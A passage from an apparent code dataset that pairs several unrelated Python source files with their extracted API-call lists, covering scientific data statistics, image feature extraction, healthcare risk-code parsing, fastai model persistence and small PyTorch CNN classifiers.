] | [((432, 448), 'mp_patch.apply', 'mp_patch.apply', ([], {}), '()\n', (446, 448), False, 'import mp_patch\n'), ((495, 542), 'multiprocessing.set_start_method', 'multiprocessing.set_start_method', (['"""spawn"""', '(True)'], {}), "('spawn', True)\n", (527, 542), False, 'import multiprocessing\n'), ((604, 649), 'flask.Flask', 'flask.Flask', (['__name__'], {'static_folder': '"""static"""'}), "(__name__, static_folder='static')\n", (615, 649), False, 'import flask\n'), ((403, 430), 'os.environ.get', 'os.environ.get', (['"""LOG_LEVEL"""'], {}), "('LOG_LEVEL')\n", (417, 430), False, 'import os\n'), ((1801, 1826), 'multiprocessing.Manager', 'multiprocessing.Manager', ([], {}), '()\n', (1824, 1826), False, 'import multiprocessing\n'), ((1964, 1981), 'sse.SSE', 'SSE', (['clients', 'mgr'], {}), '(clients, mgr)\n', (1967, 1981), False, 'from sse import SSE\n'), ((2075, 2134), 'multiprocessing.Process', 'multiprocessing.Process', ([], {'target': 'odatafetch', 'args': '(clients,)'}), '(target=odatafetch, args=(clients,))\n', (2098, 2134), False, 'import multiprocessing\n'), ((2199, 2228), 'os.path.realpath', 'os.path.realpath', (['sys.path[0]'], {}), '(sys.path[0])\n', (2215, 2228), False, 'import os\n'), ((2240, 2275), 'os.environ.get', 'os.environ.get', (['"""HOST"""', '"""127.0.0.1"""'], {}), "('HOST', '127.0.0.1')\n", (2254, 2275), False, 'import os\n'), ((1177, 1189), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1187, 1189), False, 'import uuid\n')] |
#!/usr/bin/env python
__author__ = 'meatz'
import numpy as np
import csv
import gzip
import sys
import time
import os
import re
import json
import time
import calendar
import datetime
from collections import defaultdict
from collections import Counter
import fnmatch
# add ecmwf_utils to python path
util_path = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))
print (util_path)
sys.path.append(util_path)
from ecmwf_util import Statistics
def prettyfy(number):
d = float(number)
if d - int(d) > 0:
return '{:,.2f}'.format(d)
return '{:,d}'.format(int(d))
results = {}
tapes_counter = Counter()
results["total_counted_requests"] = 0
results["total_requests_with_fdb"] = 0
results["total_requests_with_tape"] = 0
results["total_requests_with_disk"] = 0
results["total_requests_with_fdb_only"] = 0
results["total_requests_with_tape_only"] = 0
results["total_requests_with_disk_only"] = 0
exectimes_with_tape = Counter()
exectimes_no_tape = Counter()
def dump(todo_list_retrieves):
TS = 0
FIELDS = 1
FIELDS_ONLINE = 2
FIELDS_OFFLINE = 3
BYTES = 4
BYTES_ONLINE = 5
BYTES_OFFLINE = 6
TAPES = 7
TAPE_FILES = 8
EXEC_TIME = 9
DATABASE = 10
retrieves_files_read_cnt = 0
for sf in source_files:
retrieves_files_read_cnt += 1
# if retrieves_files_read_cnt == 3:
# return
with gzip.open(sf, 'rt') as csv_file:
reader = csv.reader(csv_file, delimiter=';')
next(reader) # skip header
for row in reader:
fields = int(row[FIELDS]) + int(row[FIELDS_ONLINE]) + int(row[FIELDS_OFFLINE])
bytes = int(row[BYTES])
bytes_online = int(row[BYTES_ONLINE])
bytes_offline = int(row[BYTES_OFFLINE])
tapes = int(row[TAPES])
exec_time = int(row[EXEC_TIME])
if bytes > 0:
if bytes > (1024 * 1024 * 1024 * 1024) :
print ("skipping line: %s" % row)
pass
else:
results["total_counted_requests"] += 1
tapes_counter[tapes] += 1
if bytes > 0 and (bytes_online + bytes_offline) != bytes:
results["total_requests_with_fdb"] += 1
if bytes_online > 0:
results["total_requests_with_disk"] += 1
if bytes_offline > 0:
results["total_requests_with_tape"] += 1
if bytes > 0 and bytes_online == 0 and bytes_offline == 0:
results["total_requests_with_fdb_only"] += 1
if bytes > 0 and bytes_online == bytes and bytes_offline == 0:
results["total_requests_with_disk_only"] += 1
if bytes > 0 and bytes_online == 0 and bytes_offline == bytes:
results["total_requests_with_tape_only"] += 1
if tapes > 0:
exectimes_with_tape[exec_time] += 1
else:
exectimes_no_tape[exec_time] += 1
print("%s finished reading retrieves_file: %d : %s" % (datetime.datetime.now(), retrieves_files_read_cnt, sf))
if __name__ == "__main__":
if len(sys.argv) != 2:
print ("usage: /path/to/*retrieves.csv.gz")
sys.exit(1)
source_dir = os.path.abspath(sys.argv[1])
source_files = [os.path.join(dirpath, f)
for dirpath, dirnames, files in os.walk(source_dir)
for f in fnmatch.filter(files, '*.retrieves.csv.gz')]
dump(source_files)
results["fraction_of_requests_with_tape_percent"] = prettyfy(float(results["total_requests_with_tape"]) / results["total_counted_requests"] * 100)
er = {}
er["with_tape"] = {}
er["no_tape"] = {}
er["tapes_counter"] = {}
elems = list(exectimes_no_tape.elements())
er["no_tape"]["P05"] = prettyfy(Statistics.percentile(elems, 0.05))
er["no_tape"]["P25"] = prettyfy(Statistics.percentile(elems, 0.25))
er["no_tape"]["P50"] = prettyfy(Statistics.percentile(elems, 0.50))
er["no_tape"]["P95"] = prettyfy(Statistics.percentile(elems, 0.95))
er["no_tape"]["P99"] = prettyfy(Statistics.percentile(elems, 0.99))
er["no_tape"]["mean"] = Statistics.get_meanconf_string(elems)
elems = list(exectimes_with_tape.elements())
er["with_tape"]["P05"] = prettyfy(Statistics.percentile(elems, 0.05))
er["with_tape"]["P25"] = prettyfy(Statistics.percentile(elems, 0.25))
er["with_tape"]["P50"] = prettyfy(Statistics.percentile(elems, 0.50))
er["with_tape"]["P95"] = prettyfy(Statistics.percentile(elems, 0.95))
er["with_tape"]["P99"] = prettyfy(Statistics.percentile(elems, 0.99))
er["with_tape"]["mean"] = Statistics.get_meanconf_string(elems)
tapes_counter
elems = list(tapes_counter.elements())
er["tapes_counter"]["P05"] = prettyfy(Statistics.percentile(elems, 0.05))
er["tapes_counter"]["P25"] = prettyfy(Statistics.percentile(elems, 0.25))
er["tapes_counter"]["P50"] = prettyfy(Statistics.percentile(elems, 0.50))
er["tapes_counter"]["P95"] = prettyfy(Statistics.percentile(elems, 0.95))
er["tapes_counter"]["P99"] = prettyfy(Statistics.percentile(elems, 0.99))
er["tapes_counter"]["mean"] = Statistics.get_meanconf_string(elems)
results["tape_exectimes"] = er
print (json.dumps(results, indent=2)) | [
"gzip.open",
"json.dumps",
"os.path.join",
"ecmwf_util.Statistics.get_meanconf_string",
"collections.Counter",
"datetime.datetime.now",
"fnmatch.filter",
"ecmwf_util.Statistics.percentile",
"sys.exit",
"os.path.abspath",
"csv.reader",
"sys.path.append",
"os.walk"
] | [((427, 453), 'sys.path.append', 'sys.path.append', (['util_path'], {}), '(util_path)\n', (442, 453), False, 'import sys\n'), ((657, 666), 'collections.Counter', 'Counter', ([], {}), '()\n', (664, 666), False, 'from collections import Counter\n'), ((983, 992), 'collections.Counter', 'Counter', ([], {}), '()\n', (990, 992), False, 'from collections import Counter\n'), ((1013, 1022), 'collections.Counter', 'Counter', ([], {}), '()\n', (1020, 1022), False, 'from collections import Counter\n'), ((3647, 3675), 'os.path.abspath', 'os.path.abspath', (['sys.argv[1]'], {}), '(sys.argv[1])\n', (3662, 3675), False, 'import os\n'), ((4549, 4586), 'ecmwf_util.Statistics.get_meanconf_string', 'Statistics.get_meanconf_string', (['elems'], {}), '(elems)\n', (4579, 4586), False, 'from ecmwf_util import Statistics\n'), ((5037, 5074), 'ecmwf_util.Statistics.get_meanconf_string', 'Statistics.get_meanconf_string', (['elems'], {}), '(elems)\n', (5067, 5074), False, 'from ecmwf_util import Statistics\n'), ((5565, 5602), 'ecmwf_util.Statistics.get_meanconf_string', 'Statistics.get_meanconf_string', (['elems'], {}), '(elems)\n', (5595, 5602), False, 'from ecmwf_util import Statistics\n'), ((3617, 3628), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3625, 3628), False, 'import sys\n'), ((3697, 3721), 'os.path.join', 'os.path.join', (['dirpath', 'f'], {}), '(dirpath, f)\n', (3709, 3721), False, 'import os\n'), ((4197, 4231), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.05)'], {}), '(elems, 0.05)\n', (4218, 4231), False, 'from ecmwf_util import Statistics\n'), ((4269, 4303), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.25)'], {}), '(elems, 0.25)\n', (4290, 4303), False, 'from ecmwf_util import Statistics\n'), ((4341, 4374), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.5)'], {}), '(elems, 0.5)\n', (4362, 4374), False, 'from ecmwf_util import Statistics\n'), ((4413, 4447), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.95)'], {}), '(elems, 0.95)\n', (4434, 4447), False, 'from ecmwf_util import Statistics\n'), ((4485, 4519), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.99)'], {}), '(elems, 0.99)\n', (4506, 4519), False, 'from ecmwf_util import Statistics\n'), ((4675, 4709), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.05)'], {}), '(elems, 0.05)\n', (4696, 4709), False, 'from ecmwf_util import Statistics\n'), ((4749, 4783), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.25)'], {}), '(elems, 0.25)\n', (4770, 4783), False, 'from ecmwf_util import Statistics\n'), ((4823, 4856), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.5)'], {}), '(elems, 0.5)\n', (4844, 4856), False, 'from ecmwf_util import Statistics\n'), ((4897, 4931), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.95)'], {}), '(elems, 0.95)\n', (4918, 4931), False, 'from ecmwf_util import Statistics\n'), ((4971, 5005), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.99)'], {}), '(elems, 0.99)\n', (4992, 5005), False, 'from ecmwf_util import Statistics\n'), ((5183, 5217), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.05)'], {}), '(elems, 0.05)\n', (5204, 5217), False, 'from ecmwf_util import Statistics\n'), ((5261, 5295), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.25)'], {}), '(elems, 0.25)\n', (5282, 5295), False, 'from ecmwf_util import Statistics\n'), ((5339, 5372), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.5)'], {}), '(elems, 0.5)\n', (5360, 5372), False, 'from ecmwf_util import Statistics\n'), ((5417, 5451), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.95)'], {}), '(elems, 0.95)\n', (5438, 5451), False, 'from ecmwf_util import Statistics\n'), ((5495, 5529), 'ecmwf_util.Statistics.percentile', 'Statistics.percentile', (['elems', '(0.99)'], {}), '(elems, 0.99)\n', (5516, 5529), False, 'from ecmwf_util import Statistics\n'), ((5655, 5684), 'json.dumps', 'json.dumps', (['results'], {'indent': '(2)'}), '(results, indent=2)\n', (5665, 5684), False, 'import json\n'), ((1433, 1452), 'gzip.open', 'gzip.open', (['sf', '"""rt"""'], {}), "(sf, 'rt')\n", (1442, 1452), False, 'import gzip\n'), ((1487, 1522), 'csv.reader', 'csv.reader', (['csv_file'], {'delimiter': '""";"""'}), "(csv_file, delimiter=';')\n", (1497, 1522), False, 'import csv\n'), ((3762, 3781), 'os.walk', 'os.walk', (['source_dir'], {}), '(source_dir)\n', (3769, 3781), False, 'import os\n'), ((3799, 3842), 'fnmatch.filter', 'fnmatch.filter', (['files', '"""*.retrieves.csv.gz"""'], {}), "(files, '*.retrieves.csv.gz')\n", (3813, 3842), False, 'import fnmatch\n'), ((379, 404), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (394, 404), False, 'import os\n'), ((3445, 3468), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3466, 3468), False, 'import datetime\n')] |
# how to find pi with random number generator
import numpy as np
def pi(sample):
batch = 1000
n = sample // batch
total_less_than_1 = 0
for i in range(n):
rand_num = np.random.rand(batch, 2)
square_total = (rand_num * rand_num).sum(axis=1)
total_less_than_1 += (square_total <= 1).sum()
print('P(x2 + y2 <= 1) = ', total_less_than_1 / sample)
print('approx pi is ', 4 * total_less_than_1 / sample)
return 4 * total_less_than_1 / n
pi(10**8) | [
"numpy.random.rand"
] | [((192, 216), 'numpy.random.rand', 'np.random.rand', (['batch', '(2)'], {}), '(batch, 2)\n', (206, 216), True, 'import numpy as np\n')] |
import requests
import numpy as np
import torch
from PIL import Image
from io import BytesIO
from torch import nn
from keras.applications.vgg16 import VGG16
def get_image_array(data, labels, label_map):
scaled = nn.AdaptiveMaxPool2d((1200,1200))
x_train = np.zeros((len(labels), 1200*1200))
y_train = np.array([label_map[label] for label in labels])
x_test = np.zeros((len(data) - len(labels), 1200*1200))
for i, row in enumerate(data):
image_address = row['image_url']
image = requests.get(image_address)
grey_image = Image.open(BytesIO(image.content)).convert("L")
grey_image_arr = np.array(grey_image)
temp = torch.rand(1, grey_image_arr.shape[0], grey_image_arr.shape[1])
temp[0] = torch.from_numpy(grey_image_arr)
output = scaled(temp)[0].numpy()
flattened = np.ravel(output)
if i < len(labels):
x_train[i] = flattened
else:
x_test[i - len(labels)] = flattened
return x_train, y_train, x_test
def get_image_data(data, labels, label_map, batch_size=16):
scaled = nn.AdaptiveMaxPool2d((1200, 1200))
x_train = np.zeros((len(labels), 37*37*512))
y_train = np.array([label_map[label] for label in labels])
x_test = np.zeros((len(data) - len(labels), 37*37*512))
image_batch = np.zeros((batch_size, 3, 1200, 1200))
# load model
model = VGG16(include_top=False, input_shape=(1200,1200,3))
for i, row in enumerate(data):
image_address = row['image_url']
image = requests.get(image_address)
rgb = np.array(Image.open(BytesIO(image.content)).convert("RGB")).astype(np.float32)
channel_first = np.rollaxis(np.array(rgb), 2, 0)
scaled_image = scaled(torch.from_numpy(channel_first)).numpy()
image_batch[i % batch_size] = scaled_image
if i % batch_size == batch_size - 1:
channels_last = np.rollaxis(image_batch, 1, 4)
last_layers = model.predict_on_batch(channels_last)
batch_num = i // batch_size
for j in range(batch_size):
index = batch_num * batch_size + j
if index < len(labels):
x_train[index] = last_layers[j].ravel()
else:
x_test[index - len(labels)] = last_layers[j].ravel()
return x_train, y_train, x_test
def save_image_training_data(data, categories, labels):
# image based classifier
label_map = {}
for i, category in enumerate(categories):
label_map[category.lower()] = i
x_train, y_train, x_test = get_image_data(data, labels, label_map)
with open('x_train.npy', 'wb') as f:
np.save(f, x_train)
with open('y_train.npy', 'wb') as f:
np.save(f, y_train)
with open('x_test.npy', 'wb') as f:
np.save(f, x_test) | [
"keras.applications.vgg16.VGG16",
"numpy.rollaxis",
"io.BytesIO",
"requests.get",
"torch.from_numpy",
"numpy.array",
"numpy.zeros",
"numpy.ravel",
"numpy.save",
"torch.nn.AdaptiveMaxPool2d",
"torch.rand"
] | [((218, 252), 'torch.nn.AdaptiveMaxPool2d', 'nn.AdaptiveMaxPool2d', (['(1200, 1200)'], {}), '((1200, 1200))\n', (238, 252), False, 'from torch import nn\n'), ((315, 363), 'numpy.array', 'np.array', (['[label_map[label] for label in labels]'], {}), '([label_map[label] for label in labels])\n', (323, 363), True, 'import numpy as np\n'), ((1103, 1137), 'torch.nn.AdaptiveMaxPool2d', 'nn.AdaptiveMaxPool2d', (['(1200, 1200)'], {}), '((1200, 1200))\n', (1123, 1137), False, 'from torch import nn\n'), ((1201, 1249), 'numpy.array', 'np.array', (['[label_map[label] for label in labels]'], {}), '([label_map[label] for label in labels])\n', (1209, 1249), True, 'import numpy as np\n'), ((1328, 1365), 'numpy.zeros', 'np.zeros', (['(batch_size, 3, 1200, 1200)'], {}), '((batch_size, 3, 1200, 1200))\n', (1336, 1365), True, 'import numpy as np\n'), ((1395, 1448), 'keras.applications.vgg16.VGG16', 'VGG16', ([], {'include_top': '(False)', 'input_shape': '(1200, 1200, 3)'}), '(include_top=False, input_shape=(1200, 1200, 3))\n', (1400, 1448), False, 'from keras.applications.vgg16 import VGG16\n'), ((516, 543), 'requests.get', 'requests.get', (['image_address'], {}), '(image_address)\n', (528, 543), False, 'import requests\n'), ((638, 658), 'numpy.array', 'np.array', (['grey_image'], {}), '(grey_image)\n', (646, 658), True, 'import numpy as np\n'), ((674, 737), 'torch.rand', 'torch.rand', (['(1)', 'grey_image_arr.shape[0]', 'grey_image_arr.shape[1]'], {}), '(1, grey_image_arr.shape[0], grey_image_arr.shape[1])\n', (684, 737), False, 'import torch\n'), ((756, 788), 'torch.from_numpy', 'torch.from_numpy', (['grey_image_arr'], {}), '(grey_image_arr)\n', (772, 788), False, 'import torch\n'), ((850, 866), 'numpy.ravel', 'np.ravel', (['output'], {}), '(output)\n', (858, 866), True, 'import numpy as np\n'), ((1539, 1566), 'requests.get', 'requests.get', (['image_address'], {}), '(image_address)\n', (1551, 1566), False, 'import requests\n'), ((2681, 2700), 'numpy.save', 'np.save', (['f', 'x_train'], {}), '(f, x_train)\n', (2688, 2700), True, 'import numpy as np\n'), ((2750, 2769), 'numpy.save', 'np.save', (['f', 'y_train'], {}), '(f, y_train)\n', (2757, 2769), True, 'import numpy as np\n'), ((2818, 2836), 'numpy.save', 'np.save', (['f', 'x_test'], {}), '(f, x_test)\n', (2825, 2836), True, 'import numpy as np\n'), ((1696, 1709), 'numpy.array', 'np.array', (['rgb'], {}), '(rgb)\n', (1704, 1709), True, 'import numpy as np\n'), ((1912, 1942), 'numpy.rollaxis', 'np.rollaxis', (['image_batch', '(1)', '(4)'], {}), '(image_batch, 1, 4)\n', (1923, 1942), True, 'import numpy as np\n'), ((576, 598), 'io.BytesIO', 'BytesIO', (['image.content'], {}), '(image.content)\n', (583, 598), False, 'from io import BytesIO\n'), ((1747, 1778), 'torch.from_numpy', 'torch.from_numpy', (['channel_first'], {}), '(channel_first)\n', (1763, 1778), False, 'import torch\n'), ((1601, 1623), 'io.BytesIO', 'BytesIO', (['image.content'], {}), '(image.content)\n', (1608, 1623), False, 'from io import BytesIO\n')] |
# Copyright (c) 2019, NVIDIA CORPORATION.
from cudf import DataFrame
from cuspatial._lib.shapefile_reader import cpp_read_polygon_shapefile
def read_polygon_shapefile(filename):
"""Reads a pair of .shp and .shx files into a cudf DataFrame"""
result = cpp_read_polygon_shapefile(filename)
return (
DataFrame({"f_pos": result[0], "r_pos": result[1]}),
DataFrame({"x": result[2], "y": result[3]}),
)
| [
"cudf.DataFrame",
"cuspatial._lib.shapefile_reader.cpp_read_polygon_shapefile"
] | [((263, 299), 'cuspatial._lib.shapefile_reader.cpp_read_polygon_shapefile', 'cpp_read_polygon_shapefile', (['filename'], {}), '(filename)\n', (289, 299), False, 'from cuspatial._lib.shapefile_reader import cpp_read_polygon_shapefile\n'), ((321, 372), 'cudf.DataFrame', 'DataFrame', (["{'f_pos': result[0], 'r_pos': result[1]}"], {}), "({'f_pos': result[0], 'r_pos': result[1]})\n", (330, 372), False, 'from cudf import DataFrame\n'), ((382, 425), 'cudf.DataFrame', 'DataFrame', (["{'x': result[2], 'y': result[3]}"], {}), "({'x': result[2], 'y': result[3]})\n", (391, 425), False, 'from cudf import DataFrame\n')] |
import csv
import re
from pkg_resources import resource_filename as rscfn
def padded_cc(cc):
cc = cc.replace(".","_")
pz = "".join(["0"] *(3-len(cc.split("_")[0])))
return "{}{}".format(pz, cc)
def read_dx2cc(fn):
dx2cc = {}
fn = rscfn(__name__, fn)
with open(fn, "r") as fp:
reader = csv.reader(fp, delimiter="\t")
for row in reader:
row = [x.strip() for x in row]
cc = padded_cc(row[1])
dx2cc[row[0]] = "HHS_HCC{}".format(cc)
return dx2cc
def read_code2rxc(fn):
code2rxc = {}
fn = rscfn(__name__, fn)
with open(fn, "r") as fp:
reader = csv.reader(fp, delimiter="\t")
for row in reader:
row = [x.strip() for x in row]
pz = "".join(["0"] *(2-len(row[1])))
rxc = "RXC{}{}".format(pz, row[1])
code2rxc[row[0]] = rxc
return code2rxc
def read_coefn(fn):
coef = {}
fn = rscfn(__name__, fn)
with open(fn, "r") as fp:
reader = csv.reader(fp, delimiter=",")
header = next(reader)
for row in reader:
row = [x.strip() for x in row]
if row[0] == "":
continue
agegrp = row[0]
varname = row[1]
values = {"P": float(row[3]),
"G": float(row[4]),
"S": float(row[5]),
"B": float(row[6]),
"C": float(row[7])}
coef[agegrp+"_"+varname] = values
return coef
def read_hier(fn):
hiers = {}
pttr = r"%SET0\(CC=(\d+.?\d?).+%STR\((.+)\)\)"
fn = rscfn(__name__, fn)
with open(fn, "r") as fp:
for line in fp.readlines():
matches = re.findall(pttr, line)
if len(matches) < 1 or len(matches[0]) < 2:
continue
k = "HHS_HCC"+padded_cc(matches[0][0].strip())
v = ["HHS_HCC"+padded_cc(x.strip())
for x in matches[0][1].split(",")]
hiers[k] = v
return hiers
def read_label(fn):
labels = {}
pttr = r"(HHS_HCC|HHS_CC|RXC_)(\d+.?\d?)\s?=\"(.+)\""
fn = rscfn(__name__, fn)
with open(fn, "r") as fp:
for line in fp.readlines():
matches = re.findall(pttr, line)
if len(matches) < 1 or len(matches[0]) < 2:
continue
k = matches[0][0] + matches[0][1].strip()
v = matches[0][2].strip()
labels[k] = v
return labels
| [
"re.findall",
"csv.reader",
"pkg_resources.resource_filename"
] | [((252, 271), 'pkg_resources.resource_filename', 'rscfn', (['__name__', 'fn'], {}), '(__name__, fn)\n', (257, 271), True, 'from pkg_resources import resource_filename as rscfn\n'), ((574, 593), 'pkg_resources.resource_filename', 'rscfn', (['__name__', 'fn'], {}), '(__name__, fn)\n', (579, 593), True, 'from pkg_resources import resource_filename as rscfn\n'), ((937, 956), 'pkg_resources.resource_filename', 'rscfn', (['__name__', 'fn'], {}), '(__name__, fn)\n', (942, 956), True, 'from pkg_resources import resource_filename as rscfn\n'), ((1604, 1623), 'pkg_resources.resource_filename', 'rscfn', (['__name__', 'fn'], {}), '(__name__, fn)\n', (1609, 1623), True, 'from pkg_resources import resource_filename as rscfn\n'), ((2128, 2147), 'pkg_resources.resource_filename', 'rscfn', (['__name__', 'fn'], {}), '(__name__, fn)\n', (2133, 2147), True, 'from pkg_resources import resource_filename as rscfn\n'), ((319, 349), 'csv.reader', 'csv.reader', (['fp'], {'delimiter': '"""\t"""'}), "(fp, delimiter='\\t')\n", (329, 349), False, 'import csv\n'), ((641, 671), 'csv.reader', 'csv.reader', (['fp'], {'delimiter': '"""\t"""'}), "(fp, delimiter='\\t')\n", (651, 671), False, 'import csv\n'), ((1004, 1033), 'csv.reader', 'csv.reader', (['fp'], {'delimiter': '""","""'}), "(fp, delimiter=',')\n", (1014, 1033), False, 'import csv\n'), ((1713, 1735), 're.findall', 're.findall', (['pttr', 'line'], {}), '(pttr, line)\n', (1723, 1735), False, 'import re\n'), ((2237, 2259), 're.findall', 're.findall', (['pttr', 'line'], {}), '(pttr, line)\n', (2247, 2259), False, 'import re\n')] |
from argparse import ArgumentParser
from collections import OrderedDict
from logging import getLogger
from pathlib import Path
from typing import Generator
from typing import OrderedDict as OrderedDictType
from typing import Tuple
from general_utils import get_files_dict
from general_utils.main import get_files_tuples
from tqdm import tqdm
def add_overwrite_argument(parser: ArgumentParser) -> None:
parser.add_argument("-o", "--overwrite", action="store_true",
help="overwrite existing files")
TXT_FILE_TYPE = ".txt"
def get_text_files_tqdm(directory: Path) -> OrderedDictType[str, Path]:
return OrderedDict(tqdm(get_files_tuples(directory, filetypes={TXT_FILE_TYPE})))
def raise_error_if_directory_not_exists(directory: Path) -> bool:
if not directory.exists():
logger = getLogger(__name__)
logger.error(f"Directory \"{str(directory)}\" was not found!")
return True
return False
def raise_error_if_directory_exists_and_not_overwrite(directory: Path, overwrite: bool) -> bool:
if directory.exists() and not overwrite:
logger = getLogger(__name__)
logger.error(f"Directory \"{str(directory)}\" already exists!")
return True
return False
| [
"logging.getLogger",
"general_utils.main.get_files_tuples"
] | [((816, 835), 'logging.getLogger', 'getLogger', (['__name__'], {}), '(__name__)\n', (825, 835), False, 'from logging import getLogger\n'), ((1090, 1109), 'logging.getLogger', 'getLogger', (['__name__'], {}), '(__name__)\n', (1099, 1109), False, 'from logging import getLogger\n'), ((649, 703), 'general_utils.main.get_files_tuples', 'get_files_tuples', (['directory'], {'filetypes': '{TXT_FILE_TYPE}'}), '(directory, filetypes={TXT_FILE_TYPE})\n', (665, 703), False, 'from general_utils.main import get_files_tuples\n')] |
# Copyright 2021 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from functools import partial
from pathlib import Path
from typing import Any
from modelstore.models.model_manager import ModelManager
from modelstore.storage.storage import CloudStorage
from modelstore.utils.log import logger
LEARNER_DIRECTORY = "learner"
LEARNER_FILE = "learner.pkl"
class FastAIManager(ModelManager):
"""
Model persistence for fastai models:
https://docs.fast.ai/learner.html#Learner.save
https://docs.fast.ai/learner.html#Learner.export
"""
NAME = "fastai"
def __init__(self, storage: CloudStorage = None):
super().__init__(self.NAME, storage)
def required_dependencies(self) -> list:
return ["fastai"]
def optional_dependencies(self) -> list:
deps = super(FastAIManager, self).optional_dependencies()
return deps + [
"matplotlib",
"pillow",
"torchvision",
"fastcore",
"sklearn",
"fastprogress",
"torch",
"spacy",
]
def _required_kwargs(self):
return ["learner"]
def matches_with(self, **kwargs) -> bool:
# pylint: disable=import-outside-toplevel
import fastai
if fastai.__version__.startswith("1.0"):
from fastai.basic_train import Learner
else:
from fastai.learner import Learner
return isinstance(kwargs.get("learner"), Learner)
def _get_functions(self, **kwargs) -> list:
if not self.matches_with(**kwargs):
raise TypeError("learner is not a fastai Learner!")
return [
partial(_save_model, learner=kwargs["learner"]),
partial(_export_model, learner=kwargs["learner"]),
]
def load(self, model_path: str, meta_data: dict) -> Any:
# pylint: disable=import-outside-toplevel
import fastai
if fastai.__version__.startswith("1.0"):
from fastai.basic_train import load_learner
else:
from fastai.learner import load_learner
version = meta_data["code"].get("dependencies", {}).get("fastai", "?")
if version != fastai.__version__:
logger.warn(
"Model was saved with fastai==%s, trying to load it with fastai==%s",
version,
fastai.__version__,
)
model_file = _model_file_path(model_path)
return load_learner(model_file)
def _model_file_path(parent_dir: str) -> str:
return os.path.join(parent_dir, LEARNER_FILE)
def _save_model(tmp_dir: str, learner: "fastai.learner.Leader") -> str:
# learner.save(file) will write to: self.path/self.model_dir/file;
learner_path = learner.path
learner.path = Path(tmp_dir)
file_path = learner.save(LEARNER_DIRECTORY, with_opt=True)
# Revert value
learner.path = learner_path
return str(file_path)
def _export_model(tmp_dir: str, learner: "fastai.learner.Leader") -> str:
# learner.export(file) will write to: self.path/fname
learner_path = learner.path
learner.path = Path(tmp_dir)
learner.export(LEARNER_FILE)
# Revert value
learner.path = learner_path
return _model_file_path(tmp_dir)
| [
"fastai.learner.load_learner",
"pathlib.Path",
"os.path.join",
"functools.partial",
"fastai.__version__.startswith",
"modelstore.utils.log.logger.warn"
] | [((3101, 3139), 'os.path.join', 'os.path.join', (['parent_dir', 'LEARNER_FILE'], {}), '(parent_dir, LEARNER_FILE)\n', (3113, 3139), False, 'import os\n'), ((3336, 3349), 'pathlib.Path', 'Path', (['tmp_dir'], {}), '(tmp_dir)\n', (3340, 3349), False, 'from pathlib import Path\n'), ((3677, 3690), 'pathlib.Path', 'Path', (['tmp_dir'], {}), '(tmp_dir)\n', (3681, 3690), False, 'from pathlib import Path\n'), ((1819, 1855), 'fastai.__version__.startswith', 'fastai.__version__.startswith', (['"""1.0"""'], {}), "('1.0')\n", (1848, 1855), False, 'import fastai\n'), ((2483, 2519), 'fastai.__version__.startswith', 'fastai.__version__.startswith', (['"""1.0"""'], {}), "('1.0')\n", (2512, 2519), False, 'import fastai\n'), ((3017, 3041), 'fastai.learner.load_learner', 'load_learner', (['model_file'], {}), '(model_file)\n', (3029, 3041), False, 'from fastai.learner import load_learner\n'), ((2215, 2262), 'functools.partial', 'partial', (['_save_model'], {'learner': "kwargs['learner']"}), "(_save_model, learner=kwargs['learner'])\n", (2222, 2262), False, 'from functools import partial\n'), ((2276, 2325), 'functools.partial', 'partial', (['_export_model'], {'learner': "kwargs['learner']"}), "(_export_model, learner=kwargs['learner'])\n", (2283, 2325), False, 'from functools import partial\n'), ((2777, 2896), 'modelstore.utils.log.logger.warn', 'logger.warn', (['"""Model was saved with fastai==%s, trying to load it with fastai==%s"""', 'version', 'fastai.__version__'], {}), "(\n 'Model was saved with fastai==%s, trying to load it with fastai==%s',\n version, fastai.__version__)\n", (2788, 2896), False, 'from modelstore.utils.log import logger\n')] |
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
import torch
import torch.nn as nn
class Flatten(nn.Module):
def forward(self, input):
return input.view(input.size(0), -1)
class ConvNNCifar10(nn.Module):
"""Convolutional Neural Net for Classification
"""
def __init__(self,num_classes):
super(ConvNNCifar10, self).__init__()
self.num_classes = num_classes
def blockLinear(in_features,out_features):
Layers = [nn.Linear(in_features,out_features)]
Layers.append(nn.BatchNorm1d(out_features))
Layers.append(nn.ReLU())
return Layers
def blockConv2D(in_channels, out_channels, kernel_size, stride, padding):
Layers = [nn.Conv2d(in_channels, out_channels, kernel_size, stride=stride, padding=padding)]
Layers.append(nn.BatchNorm2d(out_channels))
Layers.append(nn.ReLU())
return Layers
self.model = nn.Sequential(
*blockConv2D(3,16,7,1,2),
*blockConv2D(16,32,6,2,2),
*blockConv2D(32,64,5,1,2),
*blockConv2D(64,64,5,2,2),
Flatten(),
*blockLinear(4096,64),
*blockLinear(64,32),
nn.Linear(32,num_classes)
)
def forward(self,x):
return self.model(x)
class ConvNNMNIST(nn.Module):
